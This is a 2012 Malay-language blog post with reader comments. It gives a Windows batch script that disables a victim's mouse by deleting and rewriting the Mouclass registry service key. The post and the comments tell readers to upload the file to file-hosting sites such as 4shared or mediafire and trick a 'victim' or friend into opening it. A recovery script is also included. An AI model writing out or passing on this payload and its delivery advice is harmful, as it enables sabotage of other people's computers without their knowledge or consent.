Thursday, 6 September 2012

Buat Virus Yang Akan Melumpuhkan Mouse!


Assalamualaikum dan salam sejahtera, entry kali ini aku nak share pulak dengan korang trick virus baru.
Virus ni fungsinya untuk disable/melumpuhkan mouse/tetikus mangsa!
Senang cerita mangsa tak dapat guna mouse dia.
note : trick ni rasanya hanya berkesan bagi mangsa yang gunakan desktop PC atau laptop yang menggunakan external mouse.Touch pad mungkin tak boleh.

Baiklah jom mula!


1. Copy code dibawah :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Paste ke dalam NOTEPAD dan save seperti :

File name : mouse.bat

Save as type : All Files (*.*)

3. Siap dah virus korang.Sekarang upload ke mana2 file hosting dan hantar kepada mangsa atau kawan korang.Bila dorang bukak ja file tu automatik virus tu akan berjalan dan BOOM! Mouse tak berfungsi >.<

Cara nak recover dari virus ni?

1. Copy dan paste dalam notepad code dibawah :
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

2. Save sebagai :



File name : recover.bat
Save as type : All Files (*.*)

3. Buka file ni.Siap.



Sekian assalamualaikum....

tag - notepad virus codes, how to make a notepad virus, notepad virus prank, vb virus code, vb virus tutorial, computer mouse virus, crazy mouse virus, notepad virus code recover,how to recover from mouse virus,mouse virus recover
Item Reviewed: Buat Virus Yang Akan Melumpuhkan Mouse! Description: Rating: 5 Reviewed By Afif Zafri

Share:

9 comments:

  1. nk upload n hantr tu cmne ye??

    ReplyDelete
  2. upload masuk 4shared atau mediafire.lepas tu copy link yang dah di upload tu dan bagi dekat mangsa,suruh mangsa download.

    ReplyDelete
  3. maksudnya nnti mouse dia tk berfungsi tiba tiba?
    abis tu nnti kalau nk reccover kita ke yg kena bukak file tu untuk active kan virus dan deactivekan virus

    ReplyDelete
    Replies
    1. Mangsa yang kena buka file tu untuk aktifkan.dan kalau nak recover dia juga yang kena buat

      Delete
  4. mcm x menjadi ja.....bila kuaq CMD kna buat ap..??

    ReplyDelete
  5. kalau keluar cmd tu jadi la.tapi rasanya benda ni untuk Desktop PC ja kot.sebab aku test dekat laptop x jadi,walaupun cucuk mouse

    ReplyDelete
  6. owh...ptot la kt laptop x jd....ok3....

    ReplyDelete
  7. wah..trick baru ni..pinjam ye.. :)

    ReplyDelete
  8. Jos : amik la...jngan lupa letak backlink :D

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com